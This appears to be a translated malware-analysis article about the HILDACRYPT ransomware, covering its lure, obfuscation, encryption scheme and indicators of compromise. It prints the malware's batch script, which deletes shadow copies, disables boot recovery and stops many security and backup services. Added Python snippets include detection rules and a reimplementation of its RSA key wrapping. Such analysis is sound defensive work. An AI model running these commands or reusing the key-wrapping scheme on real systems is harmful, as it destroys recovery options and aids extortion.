Hello, Habr! Once again we are looking at a fresh version of malware from the ransomware category. HILDACRYPT is a new ransomware, a member of the Hilda family discovered in August 2019 and named after the Netflix cartoon it references. Today we will get acquainted with the technical features of this updated ransomware.
The first version of the Hilda ransomware contained, in its ransom note, a link to the show's trailer on YouTube.
Static analysis
The ransomware is a PE32 .NET executable for MS Windows, 135,168 bytes in size. Both the main code and the protector code are written in C#. According to the compilation date and timestamp, the binary was built on 14 September 2019.
Detect It Easy reports that the ransomware is protected with Confuser and ConfuserEx, but these two obfuscators are essentially the same: ConfuserEx is simply the successor to Confuser, so their code signatures are similar.
HILDACRYPT is in fact packed with ConfuserEx.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Attack vector
Presumably the ransomware was found on one of the software hosting sites, posing as the legitimate XAMPP program.
The entire infection chain can be seen in
Obfuscation
The ransomware's strings are stored in encrypted form. On startup HILDACRYPT decrypts them using Base64 and AES-256-CBC.
Installation
First of all, the ransomware creates a folder in %AppData%\Roaming whose name is a randomly generated GUID (Globally Unique Identifier). It drops a .bat file into this folder and launches it through cmd.exe:
cmd.exe /c JKfgkgj3hjgfhjka.bat & exit
The batch script then runs and disables system functions and services.
The script contains a long list of commands that destroy shadow copies and stop SQL Server, backup and antivirus solutions.
For example, it tries (unsuccessfully) to stop the Acronis Backup services. It also attacks backup and antivirus solutions from the following vendors: Veeam, Sophos, Kaspersky, McAfee and others.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop "Sophos Device Control Service" /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop "Zoolz 2 Service" /y
net stop McTaskManager /y
net stop "Sophos AutoUpdate Service" /y
net stop "Sophos System Protection Service" /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop "Symantec System Recovery" /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop "Sophos Health Service" /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop "Sophos Message Router" /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop "Sophos Clean Service" /y
net stop swi_update_64 /y
net stop "Sophos Web Control Service" /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop "Veeam Backup Catalog Data Service" /y
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop "Sophos MCS Client" /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop "SQLsafe Backup Service" /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop "Sophos Safestore Service" /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop "Sophos File Scanner Service" /y
net stop "Sophos Agent" /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop "Enterprise Client Service" /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop "SQL Backups" /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop "Sophos MCS Agent" /y
net stop RESvc /y
net stop "Acronis VSS Provider" /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop "SQLsafe Filter Service" /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
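The script above is a compact catalogue of impact and defence-evasion tactics: shrinking and then deleting shadow copies, switching off Windows boot recovery, and stopping dozens of backup, database and antivirus services in a burst. The following Python snippet is an added example (not code from the article or from HILDACRYPT) of turning that into detection logic over process-creation telemetry. The events are constructed to mimic Sysmon EventID 1 records, and the vendor fragments used to recognise targeted services are an assumption drawn from the service names in the script.

```python
"""Detection logic for the tactics in the HILDACRYPT batch script, run over
constructed process-creation records.  Added example, not from the article."""
import re
from dataclasses import dataclass, field

# Constructed Sysmon-style (EventID 1) records: (timestamp, parent image, command line).
SAMPLE_EVENTS = [
    ("2019-09-14T10:00:01", r"C:\Users\u\AppData\Roaming\xamp.exe",
     "cmd.exe /c JKfgkgj3hjgfhjka.bat & exit"),
    ("2019-09-14T10:00:02", "cmd.exe",
     "vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB"),
    ("2019-09-14T10:00:02", "cmd.exe", "bcdedit /set {default} recoveryenabled No"),
    ("2019-09-14T10:00:03", "cmd.exe",
     "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ("2019-09-14T10:00:03", "cmd.exe", "vssadmin Delete Shadows /all /quiet"),
    ("2019-09-14T10:00:04", "cmd.exe", 'net stop "Sophos AutoUpdate Service" /y'),
    ("2019-09-14T10:00:04", "cmd.exe", "net stop VeeamBackupSvc /y"),
    ("2019-09-14T10:00:04", "cmd.exe", "net stop AcrSch2Svc /y"),
    ("2019-09-14T10:00:05", "cmd.exe", "net stop MSSQLSERVER /y"),
    # Benign noise that must not fire: a user editing a file, an admin restarting the spooler.
    ("2019-09-14T10:05:00", "explorer.exe", "notepad.exe C:\\notes.txt"),
    ("2019-09-14T10:06:00", "mmc.exe", "net stop Spooler /y"),
]

# One rule per tactic in the script.  Case-insensitive; "vssadmin.exe" spellings included.
RULES = {
    "shadow_delete": re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows\b", re.I),
    "shadow_squeeze": re.compile(r"\bvssadmin(\.exe)?\s+resize\s+shadowstorage\b.*/maxsize=", re.I),
    "boot_recovery_off": re.compile(
        r"\bbcdedit(\.exe)?\s+/set\b.*\b(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)\b",
        re.I),
    "bat_then_exit": re.compile(r"\bcmd(\.exe)?\s+/c\s+\S+\.bat\s*&\s*exit\b", re.I),
}
# Assumed vendor fragments, taken from the service names the script stops.
TARGET_HINTS = ("sophos", "veeam", "acronis", "acrsch", "mcafee", "mfe", "kav",
                "klnagent", "avp", "ekrn", "backupexec", "bedbg", "sql", "sav", "smc")
NET_STOP = re.compile(r'\bnet1?(\.exe)?\s+stop\s+"?([^"/]+?)"?\s*(/y)?\s*$', re.I)

@dataclass
class Verdict:
    tactics: set = field(default_factory=set)    # rule names that fired
    stopped: list = field(default_factory=list)  # targeted services seen in `net stop`

    @property
    def score(self):
        return len(self.tactics)

def analyse(events, min_service_hits=3):
    """Aggregate the rules over a batch of events (e.g. one host, one minute)."""
    v = Verdict()
    for _ts, _parent, cmd in events:
        v.tactics.update(name for name, rx in RULES.items() if rx.search(cmd))
        m = NET_STOP.search(cmd)
        if m:
            svc = m.group(2).strip()
            if any(h in svc.lower() for h in TARGET_HINTS):
                v.stopped.append(svc)
    # A single `net stop` is routine admin work; a burst against backup/AV services is not.
    if len(v.stopped) >= min_service_hits:
        v.tactics.add("mass_service_stop")
    return v
```

The rules are deliberately independent: shadow-copy deletion or `bcdedit` recovery tampering by itself is a high-confidence signal, while service stops are only scored once several targeted services fall in the same batch, so that an administrator restarting one service does not trigger the verdict.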
Once the services and processes listed above have been stopped, the cryptolocker collects information about all running processes with the tasklist command, to make sure that all the required services are down.
tasklist /v /fo csv
This command prints a detailed list of running processes as quoted fields separated by the "," character; one record looks like this:
"csrss.exe","448","Services","0","1 896 KB","Unknown","N/A","0:00:03","N/A"
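As an added example (not the article's code), here is how that output is parsed with Python's csv module. Every field is quoted and the last column, the window title, can itself contain commas, so splitting on "," mis-parses records. The sample output is constructed, and the watched image names are an assumption; a defender can run the same check in reverse, to verify that endpoint protection and backup agents are still alive after a suspicious burst of net stop commands.

```python
"""Parse `tasklist /v /fo csv` output and check which targeted images are
still alive.  Added example, not from the article; the sample is constructed."""
import csv
import io

# Constructed sample in tasklist's /v /fo csv column order.  The last record has a window
# title containing commas, which is why the csv module (not str.split) is used.
SAMPLE_TASKLIST = (
    '"Image Name","PID","Session Name","Session#","Mem Usage","Status","User Name","CPU Time","Window Title"\n'
    '"csrss.exe","448","Services","0","1,896 K","Unknown","N/A","0:00:03","N/A"\n'
    '"SAVService.exe","1204","Services","0","12,340 K","Unknown","NT AUTHORITY\\SYSTEM","0:00:10","N/A"\n'
    '"Veeam.Backup.Service.exe","2044","Services","0","55,120 K","Unknown","NT AUTHORITY\\SYSTEM","0:01:02","N/A"\n'
    '"notepad.exe","3120","Console","1","8,004 K","Running","HOST\\user","0:00:00","notes, drafts, todo - Notepad"\n'
)

def parse_tasklist_csv(text):
    """Rows keyed by the header line; PID and memory are normalised to integers."""
    rows = list(csv.DictReader(io.StringIO(text)))
    for r in rows:
        r["PID"] = int(r["PID"])
        # Memory is localised ("1,896 K", "1 896 KB", ...): keep only the digits (KiB).
        r["Mem Usage"] = int("".join(ch for ch in r["Mem Usage"] if ch.isdigit()))
    return rows

def still_running(rows, targets):
    """Case-insensitive match of image names against a target list, e.g. AV/backup agents."""
    wanted = {t.lower() for t in targets}
    return sorted(r["Image Name"] for r in rows if r["Image Name"].lower() in wanted)

# Assumed image names for vendors the script targets; real names vary by product version.
WATCHED_IMAGES = ["SAVService.exe", "Veeam.Backup.Service.exe", "ekrn.exe", "mfemms.exe"]
```

Note that the memory column is rendered in the machine's locale (the record quoted above came from a non-English Windows, hence "1 896 KB" rather than "1,896 K"), which is why the parser strips everything but the digits instead of assuming one separator.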
After this check, the ransomware starts the encryption process.
Encryption
File encryption
HILDACRYPT walks all files on the hard drives, except for the Recycle.Bin and Reference Assemblies\Microsoft folders. The latter holds the important dll, pdb and other files of .NET applications, and damaging them could break the ransomware itself. To select files for encryption, the following list of extensions is used:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
The ransomware uses the AES-256-CBC algorithm to encrypt the user's files. The key size is 256 bits and the initialization vector (IV) is 16 bytes.
In the following screenshot, the values byte_2 and byte_1 (the key and the IV) are generated randomly using GetBytes().
Key
IV
An encrypted file receives the extension HCY!. Below is an example of an encrypted file; the key and IV shown above were generated for this file.
Key encryption
The cryptolocker stores the generated AES key inside the encrypted file. The first part of the encrypted file is a header containing the fields HILDACRYPT, KEY, IV and FileLen in XML format, and looks like this:
The AES key and IV are encrypted with RSA-2048 and then Base64-encoded. The RSA public key is stored in the body of the cryptolocker, in XML format, as one of the encrypted strings:
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
The RSA public key is used to encrypt the AES file key. It is Base64-encoded and consists of the modulus and the public exponent 65537 (the trailing AQAB in the string above). Decrypting the file key requires the RSA private key, which only the attacker has.
After RSA encryption, the Base64-encoded encrypted AES key is stored in the encrypted file.
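The key handling described in this section, as an added Python example (not HILDACRYPT's own code): it parses a .NET-style <RSAKeyValue> XML public key (the modulus and AQAB exponent are the ones printed above; the surrounding element names are the RSA.ToXmlString layout and are assumed to be what the sample uses), wraps a random AES-256 key and 16-byte IV with RSA PKCS#1 v1.5 padding (assumed, being what RSACryptoServiceProvider.Encrypt produces with fOAEP=false), and builds and parses a header with the KEY, IV and FileLen fields (the exact tag layout is assumed). The AES-CBC file body, and the Base64+AES string layer from the Obfuscation section, are not implemented because the standard library has no AES; a throwaway RSA key pair is generated only to show that unwrapping needs the private half.

```python
"""RSA-wrapped AES key header as described in the article.  Added example,
not HILDACRYPT's own code; see the lead-in for what is assumed."""
import base64
import os
import random
import xml.etree.ElementTree as ET

_rng = random.SystemRandom()

# Modulus and exponent copied from the article; <RSAKeyValue> tags are the .NET layout (assumed).
PUBLIC_KEY_XML = (
    "<RSAKeyValue><Modulus>"
    "28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1"
    "B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi"
    "49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQ"
    "ix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT7"
    "2/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ=="
    "</Modulus><Exponent>AQAB</Exponent></RSAKeyValue>"
)

def parse_rsa_key_xml(xml_text):
    """.NET RSA.ToXmlString(): Base64 of big-endian unsigned Modulus and Exponent."""
    root = ET.fromstring(xml_text)
    n = int.from_bytes(base64.b64decode(root.findtext("Modulus")), "big")
    e = int.from_bytes(base64.b64decode(root.findtext("Exponent")), "big")
    return n, e

def pkcs1_v15_encrypt(msg, n, e):
    """RSAES-PKCS1-v1_5: EM = 00 02 <non-zero random PS, >= 8 bytes> 00 <msg>; c = EM^e mod n."""
    k = (n.bit_length() + 7) // 8
    if len(msg) > k - 11:
        raise ValueError("message too long for the key")
    ps = bytes(_rng.randrange(1, 256) for _ in range(k - len(msg) - 3))
    em = b"\x00\x02" + ps + b"\x00" + msg
    return pow(int.from_bytes(em, "big"), e, n).to_bytes(k, "big")

def pkcs1_v15_decrypt(ct, n, d):
    k = (n.bit_length() + 7) // 8
    em = pow(int.from_bytes(ct, "big"), d, n).to_bytes(k, "big")
    if em[:2] != b"\x00\x02" or b"\x00" not in em[10:]:
        raise ValueError("bad PKCS#1 v1.5 padding")
    return em[em.index(b"\x00", 10) + 1:]

def build_header(aes_key, iv, file_len, n, e):
    """Header with the article's field names; the exact tag layout is assumed."""
    wrap = lambda b: base64.b64encode(pkcs1_v15_encrypt(b, n, e)).decode()
    return (f"<HILDACRYPT><KEY>{wrap(aes_key)}</KEY><IV>{wrap(iv)}</IV>"
            f"<FileLen>{file_len}</FileLen></HILDACRYPT>")

def parse_header(header, n, d):
    """What only the attacker can do: unwrap KEY and IV with the private exponent d."""
    root = ET.fromstring(header)
    unwrap = lambda tag: pkcs1_v15_decrypt(base64.b64decode(root.findtext(tag)), n, d)
    return unwrap("KEY"), unwrap("IV"), int(root.findtext("FileLen"))

def _probable_prime(p, rounds=16):
    """Miller-Rabin; enough for a throwaway demo key."""
    if p < 4 or p % 2 == 0:
        return p in (2, 3)
    d, r = p - 1, 0
    while d % 2 == 0:
        d, r = d // 2, r + 1
    for _ in range(rounds):
        x = pow(_rng.randrange(2, p - 1), d, p)
        if x in (1, p - 1):
            continue
        for _ in range(r - 1):
            x = pow(x, 2, p)
            if x == p - 1:
                break
        else:
            return False
    return True

def demo_keypair(bits=2048):
    """Stand-in for the attacker's key pair (e = 65537).  Demo only, not a real key generator."""
    def prime(b):
        while True:
            c = _rng.getrandbits(b) | (1 << (b - 1)) | 1
            if _probable_prime(c):
                return c
    while True:
        p, q = prime(bits // 2), prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % 65537:
            return p * q, 65537, pow(65537, -1, phi)

def round_trip(bits=2048):
    """Wrap a fresh key/IV with the public half, recover them with the private half."""
    n, e, d = demo_keypair(bits)
    key, iv = os.urandom(32), os.urandom(16)
    return (key, iv, 4096) == parse_header(build_header(key, iv, 4096, n, e), n, d)
```

With the article's key, parse_rsa_key_xml yields a 2048-bit modulus and e = 65537, and build_header produces wrapped KEY and IV fields of 256 bytes each; without the matching d there is no way back from those fields to the AES key, which is the whole point of the scheme.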
Ransom note
When encryption finishes, HILDACRYPT writes an html file into each folder whose files it has encrypted. The ransom note contains two email addresses through which the victim can contact the attacker.
The ransom note also contains the phrase "No loli is safe ;)", a reference to anime and manga characters drawn as young girls, which are banned in Japan.
Conclusion
HILDACRYPT, a new ransomware family, has released a new version. Its encryption scheme prevents the victim from decrypting the files the ransomware has encrypted. The cryptolocker uses active protection techniques to disable security services belonging to backup and antivirus solutions. The author of HILDACRYPT is a fan of the animated series Hilda shown on Netflix; a link to its trailer was included in the ransom note of the previous version of the program.
As always,
Indicators of compromise
File extension HCY!
HILDACRYPTReadMe.html
xamp.exe, with a single "p" and no digital signature
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Source: www.habr.com